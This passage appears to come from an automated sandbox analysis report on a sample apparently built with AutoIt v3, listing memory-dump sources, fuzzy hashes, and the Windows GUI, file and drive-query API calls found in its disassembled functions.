                                                • Instruction ID: 74983d57afbfc13c18b192d592468b40f2edd42eefdf389e9aab6407b7e7532e
                                                • Opcode Fuzzy Hash: 6ff5f349d53e070dc071dc6e2eb1d6970500c3846a650fcae8815514f6aaee21
                                                • Instruction Fuzzy Hash: 9A324521D69F014EDB239635CC22335A689EFB73C5F15C737E81AB6AA5EF68C5839100
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8318c9611c82784f7f620fe9a75abc77dc81b00f53afedf55bd0200a3dab8da
                                                • Instruction ID: 65497ceacaff5269eec6a21d5f6feb29dbcd70af27cda92e5a73be1cabc3a619
                                                • Opcode Fuzzy Hash: c8318c9611c82784f7f620fe9a75abc77dc81b00f53afedf55bd0200a3dab8da
                                                • Instruction Fuzzy Hash: 6432F331A001598BCF28CE68D4D467D7FE1EB45300F2885EAD4DEDB296E638DE81DB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76e02dd3e382dd74b1354a9ce9f9622f16ddc629c650c56ba59a3a027342d3fc
                                                • Instruction ID: b255a07001b261a90dc9367c1238984824208a8ee5647a03bda894a9d8459a42
                                                • Opcode Fuzzy Hash: 76e02dd3e382dd74b1354a9ce9f9622f16ddc629c650c56ba59a3a027342d3fc
                                                • Instruction Fuzzy Hash: D622B471A00609DFDF14CFA8D980AAEB7FAFF48314F148529D816A7290EB36E915DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
                                                • Instruction ID: dbeda51c1fbc19dfc6779c33b7991536182f4edb95d9e79c463f9dcfbd0dc27d
                                                • Opcode Fuzzy Hash: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
                                                • Instruction Fuzzy Hash: 7D02C5B1E00609EFDF05DF64D980BAEB7B6FF44314F508169E8169B290EB31AA15CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID:
                                                • API String ID: 176396367-0
                                                • Opcode ID: 8a102234217cb8fc5e12fb5b6e35db5449b99f49e6866c8df089dfd82f192649
                                                • Instruction ID: 305b8b6174d78dc177d3efe9c35c877df441707c5a8d5773efb2a8118ec4a0b5
                                                • Opcode Fuzzy Hash: 8a102234217cb8fc5e12fb5b6e35db5449b99f49e6866c8df089dfd82f192649
                                                • Instruction Fuzzy Hash: A8023C71604210DFD714DF28C4D4E2ABBE5EF88318F18889DE84ACB2A6DB31ED45CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 008d7f4966374fd70fc10806bddab33b900210bcee92a512a1071b2935ce9feb
                                                • Instruction ID: 8ec2bad96e153d2c18562b8be7a83f80d5ee39a5977abc4b3d730f1d5ef11161
                                                • Opcode Fuzzy Hash: 008d7f4966374fd70fc10806bddab33b900210bcee92a512a1071b2935ce9feb
                                                • Instruction Fuzzy Hash: ADA10770242124BEEE27BBBC8D98E7B265EFB42714B04491AF503D61B0CF259949C676
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7a3ac8471f91f87413cf2040edfb0e0a623f0fab5818d86c8d40d2451d7a50e
                                                • Instruction ID: 9520556ea2ee99dc3e2db47dc909f8d7ef19841dc9dd4d15d74daeb3ca75fb23
                                                • Opcode Fuzzy Hash: d7a3ac8471f91f87413cf2040edfb0e0a623f0fab5818d86c8d40d2451d7a50e
                                                • Instruction Fuzzy Hash: CBB1F420D2AF414DD6239A398871336FA5C6FBB6D6F91D72BFC1674D62FB2285834240
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 198a520ea869a35980b3f78eccd319767a6126f68f47798b27a54d549f42ff15
                                                • Instruction ID: aeebc4acb0360d3be6002eaea23e4eafbe8cb3936db8fe1591284522e92c45d1
                                                • Opcode Fuzzy Hash: 198a520ea869a35980b3f78eccd319767a6126f68f47798b27a54d549f42ff15
                                                • Instruction Fuzzy Hash: F6B127319106088FD715CF28D4CAB657BE0FB05368F658659E899CF2E1CB35E991CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                • Instruction ID: 8258521909d63cbbeadcc3f37fd6ac4f04439e78871d0caa496f4740457f1702
                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                • Instruction Fuzzy Hash: C29182322080E38AEBED427A857417EFFE95E821B570A079ED5F6CA1C5EF10D164DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                • Instruction ID: 8f8b5deae01846aca9404681a4f41bcb7750a2407e9145ecd29b5d0c7f50230f
                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                • Instruction Fuzzy Hash: 9F9184732080A38ADBED423A857413EFFE95A821B530A079ED5FACB1C5EF24D164D760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                • Instruction ID: ae8f3d7d179c724ba92a9e0d8e9191ea33b26186852a53274cf0eb6371ac215e
                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                • Instruction Fuzzy Hash: E89173722191A34EDBED423A857413EFFED5A421A530A07AED5F2CA1CAFF14D164D720
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e3d0bc900cf1b892d14c28e0ffe1d7d887a8a211ac8b23e48eb025ee859e12e
                                                • Instruction ID: cf1d50f1682cbf562a2a482d272999eed1c689a14be31d3a70eeee6269a1fe3f
                                                • Opcode Fuzzy Hash: 2e3d0bc900cf1b892d14c28e0ffe1d7d887a8a211ac8b23e48eb025ee859e12e
                                                • Instruction Fuzzy Hash: 0C618972200705A6DFF49A68C854BFEA3ADDF81708F05092EEB63CB280E711E946C755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62de30cbe308c2b2cb8d72c6a4f5f113deb5d1fc96455593ad16d38271f3c341
                                                • Instruction ID: ac55677b03369cabe341b8ca6dafce9767db5e9318eefe1f3caa8c2fecd89769
                                                • Opcode Fuzzy Hash: 62de30cbe308c2b2cb8d72c6a4f5f113deb5d1fc96455593ad16d38271f3c341
                                                • Instruction Fuzzy Hash: EA61473170070966DEF859E89C94BFEE39EAB41308F140D1AEB42DF288D751E94AC755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                • Instruction ID: 1bfe75114873cd747ddd28e8cbfb9648e54a96dbf6145125eaa126c4afaf49b6
                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                • Instruction Fuzzy Hash: CE8162732091A349DBE9463A857413EFFED6E422A630A079DD5F2CA1CBFF249158D720
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 85744c366e71fd3b64767d752a9e6a279bca2783efa5c6de61b6923aab094b7a
                                                • Instruction ID: 48d4d8aef9c7252ee8c04a9329af1c20f68d0204bd54d73e95c4f7e55ba568d9
                                                • Opcode Fuzzy Hash: 85744c366e71fd3b64767d752a9e6a279bca2783efa5c6de61b6923aab094b7a
                                                • Instruction Fuzzy Hash: 4321E7326206118BDB28CF79C82367E73E9E794310F14866EE4A7C73D0DE75A904CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 00B92B30
                                                • DeleteObject.GDI32(00000000), ref: 00B92B43
                                                • DestroyWindow.USER32 ref: 00B92B52
                                                • GetDesktopWindow.USER32 ref: 00B92B6D
                                                • GetWindowRect.USER32(00000000), ref: 00B92B74
                                                • SetRect.USER32 ref: 00B92CA3
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B92CB1
                                                • CreateWindowExW.USER32 ref: 00B92CF8
                                                • GetClientRect.USER32 ref: 00B92D04
                                                • CreateWindowExW.USER32 ref: 00B92D40
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00B92D62
                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B92D75
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B92D80
                                                • GlobalLock.KERNEL32 ref: 00B92D89
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B92D98
                                                • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B92DA1
                                                • CloseHandle.KERNEL32(00000000), ref: 00B92DA8
                                                • GlobalFree.KERNEL32(00000000), ref: 00B92DB3
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00B92DC5
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BAFC38,00000000), ref: 00B92DDB
                                                • GlobalFree.KERNEL32(00000000), ref: 00B92DEB
                                                • CopyImage.USER32 ref: 00B92E11
                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B92E30
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00B92E52
                                                • ShowWindow.USER32(00000004), ref: 00B9303F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 2211948467-2373415609
                                                • Opcode ID: ee1d7130b66b774990c81d9a94e3b3ce86325961b44a4192450635b5f009c3f1
                                                • Instruction ID: ee34b580dd682382e7df754aa0251edbdf2a272d356b727c9545736e83c30d1a
                                                • Opcode Fuzzy Hash: ee1d7130b66b774990c81d9a94e3b3ce86325961b44a4192450635b5f009c3f1
                                                • Instruction Fuzzy Hash: 19027B71A00205EFDB14DF68CC89EAE7BF9EF49710F148598F915AB2A1DB70AD41CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DestroyWindow.USER32 ref: 00B28E14
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B66AC5
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B66AFE
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B66F43
                                                  • Part of subcall function 00B28F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00B28FC5
                                                • SendMessageW.USER32(?,00001053), ref: 00B66F7F
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B66F96
                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B66FAC
                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B66FB7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 2760611726-4108050209
                                                • Opcode ID: d99b7235bd7e8541679760fbab8bdbf70717f6a91bd15fb635768aeb321eb643
                                                • Instruction ID: 125ab60b5e3225d0b5473bb6631807fd20e218c89185d8a50e3b15a0ef2a9ae0
                                                • Opcode Fuzzy Hash: d99b7235bd7e8541679760fbab8bdbf70717f6a91bd15fb635768aeb321eb643
                                                • Instruction Fuzzy Hash: EE12D034601251EFDB25DF18D885BAABBE1FB45300F1844A9F489CB262CB36EC52CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DestroyWindow.USER32 ref: 00B9273E
                                                • SystemParametersInfoW.USER32 ref: 00B9286A
                                                • SetRect.USER32 ref: 00B928A9
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B928B9
                                                • CreateWindowExW.USER32 ref: 00B92900
                                                • GetClientRect.USER32 ref: 00B9290C
                                                • CreateWindowExW.USER32 ref: 00B92955
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B92964
                                                • GetStockObject.GDI32(00000011), ref: 00B92974
                                                • SelectObject.GDI32(00000000,00000000), ref: 00B92978
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00B92988
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B92991
                                                • DeleteDC.GDI32(00000000), ref: 00B9299A
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B929C6
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B929DD
                                                • CreateWindowExW.USER32 ref: 00B92A1D
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B92A31
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B92A42
                                                • CreateWindowExW.USER32 ref: 00B92A77
                                                • GetStockObject.GDI32(00000011), ref: 00B92A82
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B92A8D
                                                • ShowWindow.USER32(00000004), ref: 00B92A97
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 46073dc5e5411a888ee19ab6d6525d01f750eaa2946c2da6876907abe4dcc675
                                                • Instruction ID: 1c4fc60cad970e91725830b714524bdecd697d6db09ccfbd006b923dcb0132ea
                                                • Opcode Fuzzy Hash: 46073dc5e5411a888ee19ab6d6525d01f750eaa2946c2da6876907abe4dcc675
                                                • Instruction Fuzzy Hash: 7DB14C71A40215BFEB14DFA8CC8AEAE7BF9EB09710F104554F915EB290DB74AD40CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00B84AED
                                                • GetDriveTypeW.KERNEL32(?,00BACB68,?,\\.\,00BACC08), ref: 00B84BCA
                                                • SetErrorMode.KERNEL32(00000000,00BACB68,?,\\.\,00BACC08), ref: 00B84D36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 30287259e53c4fd72741b9b89fe8dd4f63786af06cbde59d058435da2e581125
                                                • Instruction ID: d34d1cb0fe6b2972dc1c38648f114cad5216569085af3e23213df009054ee1c4
                                                • Opcode Fuzzy Hash: 30287259e53c4fd72741b9b89fe8dd4f63786af06cbde59d058435da2e581125
                                                • Instruction Fuzzy Hash: 5B618030605207ABCB04EF24DAC29A9B7F5EB05340B2484E6F806AB7B1EB75ED41DF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 00BA02E5
                                                • _wcslen.LIBCMT ref: 00BA031F
                                                • _wcslen.LIBCMT ref: 00BA0389
                                                • _wcslen.LIBCMT ref: 00BA03F1
                                                • _wcslen.LIBCMT ref: 00BA0475
                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BA04C5
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA0504
                                                  • Part of subcall function 00B2F9F2: _wcslen.LIBCMT ref: 00B2F9FD
                                                  • Part of subcall function 00B7223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B72258
                                                  • Part of subcall function 00B7223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B7228A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                • API String ID: 1103490817-719923060
                                                • Opcode ID: 1ce63c110c09d2be590369c6455f6a841b8229ed804ad6e896d555c5dcd81c23
                                                • Instruction ID: fb5ebd11b717cba0769a74948fd64fd0839ad44369bab447cd7b5d5cdc4c1fb7
                                                • Opcode Fuzzy Hash: 1ce63c110c09d2be590369c6455f6a841b8229ed804ad6e896d555c5dcd81c23
                                                • Instruction Fuzzy Hash: F9E1A0312282019FC714EF28C49196AB7E6FF99314F5449EDF8969B3A1EB30ED45CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SystemParametersInfoW.USER32 ref: 00B28968
                                                • GetSystemMetrics.USER32 ref: 00B28970
                                                • SystemParametersInfoW.USER32 ref: 00B2899B
                                                • GetSystemMetrics.USER32 ref: 00B289A3
                                                • GetSystemMetrics.USER32 ref: 00B289C8
